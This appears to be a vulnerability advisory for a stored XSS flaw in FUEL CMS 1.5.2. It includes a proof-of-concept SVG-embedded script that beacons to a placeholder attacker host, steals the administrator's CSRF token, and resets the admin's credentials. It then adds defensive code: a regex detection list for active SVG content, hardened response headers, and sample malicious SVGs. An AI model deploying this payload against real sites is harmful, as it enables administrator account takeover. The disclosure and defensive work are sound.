# CVE-2026-38948 Vulnerability Summary

## Overview

* **Vulnerability Name**: FUEL CMS 1.5.2 Stored Cross-Site Scripting (Stored XSS) Leading to Administrator Account Takeover
* **CVE ID**: CVE-2026-38948
* **Severity**: 7.1 High
* **Vulnerability Type**: Stored Cross-Site Scripting (Stored XSS)
* **Exploitation Principle**: An authenticated low-privileged user uploads an SVG file containing embedded JavaScript through the asset upload feature. The CMS stores the file and serves it back from the same origin as the admin interface (the POC below uses origin-relative URLs), so when an administrator opens or previews the asset the script runs with the administrator's browser session. The script fetches the administrator's own profile edit page, reads the CSRF token out of the returned form, and submits a profile update that changes the username, email and password, which results in full takeover of the administrator account.

## Affected Scope

* **Affected Product**: FUEL CMS
* **Affected Versions**: 1.5.2 and earlier

## Remediation

* **Official Link**: https://github.com/daylightstudio/FUEL-CMS
* **Vendor Website**: https://www.getfuelcms.com/

## POC Code

The script body that is embedded in the uploaded SVG. `YOURIP:5656` is a placeholder for an attacker-controlled listener that only records that an administrator rendered the file.

```javascript
// Beacon: notify the attacker's listener (placeholder host) that an admin rendered the SVG.
fetch('http://YOURIP:5656/admin-opened');

// Load the administrator's own profile form with their session cookie and
// extract the CSRF token the form carries.
fetch('/fuel/my_profile/edit', { credentials: 'include' })
  .then(r => r.text())
  .then(html => {
    const token = html.match(/ci_csrf_token_FUEL" value="([^"]+)"/)[1];

    // Rebuild the profile form with attacker-chosen account details.
    const data = new FormData();
    data.append('user_name', 'account_taken');
    data.append('email', 'account_taken@fuel.com');
    data.append('first_name', 'account_taken');
    data.append('last_name', 'name');
    data.append('new_password', '1234');
    data.append('confirm_password', '1234');
    data.append('language', 'english');
    data.append('ci_csrf_token_FUEL', token);
    data.append('fuel_inline', '0');

    // Submit it as the administrator; the freshly read token passes the CSRF check.
    fetch('/fuel/my_profile/edit?inline=1', {
      method: 'POST',
      body: data,
      credentials: 'include',
    });
  });
```
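The advisory describes the attack but not a fix, so the following is an added defensive example. It is not FUEL CMS code and not part of the original advisory; the function names, the list of patterns, the header values and the sample SVG files are all constructed for illustration. It shows the two controls a practitioner would pair against stored SVG XSS: a triage check that rejects uploaded SVGs carrying active content, and the response headers that keep a stored SVG from executing script in the viewer's session if one gets through. Regex matching is a coarse filter (a false positive only costs a rejected upload) and is not a substitute for the headers or for serving user uploads from a separate origin.

```javascript
// Added example, not FUEL CMS code. Coarse triage of uploaded SVG source for
// anything that can execute or load remote content when the file is rendered
// as a document (as in the advisory, where an admin previews the asset).
const ACTIVE_CONTENT_CHECKS = [
  { name: 'script element',           re: /<\s*script\b/i },
  { name: 'event handler attribute',  re: /\son[a-z]+\s*=/i },
  { name: 'javascript: or data: URL', re: /(?:href|src|values|to|from)\s*=\s*["']?\s*(?:javascript|data)\s*:/i },
  { name: 'foreignObject',            re: /<\s*foreignObject\b/i },
  { name: 'embedded document',        re: /<\s*(?:iframe|embed|object)\b/i },
  { name: 'remote reference',         re: /(?:xlink:)?href\s*=\s*["']\s*(?:https?:)?\/\//i },
  { name: 'DTD entity',               re: /<!ENTITY\b/i },
];

// Returns the names of every check the SVG source trips; an empty array means clean.
function findActiveContent(svgText) {
  return ACTIVE_CONTENT_CHECKS.filter(c => c.re.test(svgText)).map(c => c.name);
}

function isSafeSvgUpload(svgText) {
  return findActiveContent(svgText).length === 0;
}

// Headers for serving a stored SVG. With inlinePreview=false the browser
// downloads the file instead of rendering it, which removes the script
// execution path entirely. With inlinePreview=true the CSP forbids script and
// sandboxes the document, so a payload like the advisory's cannot run or reach
// the CMS session; nosniff stops the type being reinterpreted as HTML.
function svgResponseHeaders(fileName, inlinePreview = false) {
  const safeName = fileName.replace(/["\r\n]/g, '');
  return {
    'Content-Type': 'image/svg+xml',
    'X-Content-Type-Options': 'nosniff',
    'Content-Security-Policy': "default-src 'none'; img-src 'self' data:; style-src 'unsafe-inline'; sandbox",
    'Content-Disposition': `${inlinePreview ? 'inline' : 'attachment'}; filename="${safeName}"`,
  };
}

// Constructed sample uploads (not captured from a real FUEL CMS instance).
const BENIGN_SVG = `<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100">
  <circle cx="50" cy="50" r="40" fill="steelblue"/>
</svg>`;

// Same shape as the advisory's payload: a <script> element that reads the
// viewer's profile page with their cookies.
const SCRIPT_SVG = `<svg xmlns="http://www.w3.org/2000/svg">
  <script><![CDATA[
    fetch('/fuel/my_profile/edit', {credentials: 'include'}).then(r => r.text());
  ]]></script>
</svg>`;

// Script without a <script> tag: an event handler attribute.
const HANDLER_SVG = `<svg xmlns="http://www.w3.org/2000/svg" onload="fetch('/fuel/my_profile/edit')">
  <rect width="10" height="10"/>
</svg>`;

// Script without <script> or on*: an animated link target set to a javascript: URL.
const ANIMATE_SVG = `<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <a><text y="20">click</text>
    <animate attributeName="xlink:href" values="javascript:alert(1)"/>
  </a>
</svg>`;

for (const [label, svg] of Object.entries({ BENIGN_SVG, SCRIPT_SVG, HANDLER_SVG, ANIMATE_SVG })) {
  const verdict = isSafeSvgUpload(svg) ? 'accept' : `reject: ${findActiveContent(svg).join(', ')}`;
  console.log(`${label}: ${verdict}`);
}
```

Run it with Node; the three malicious samples are each rejected by a different check, which is the point of keeping the pattern list broad rather than matching only `<script>`. A stricter deployment rejects SVG uploads from low-privileged roles outright, or rasterizes them to PNG on upload, and in every case serves whatever is stored with the headers above.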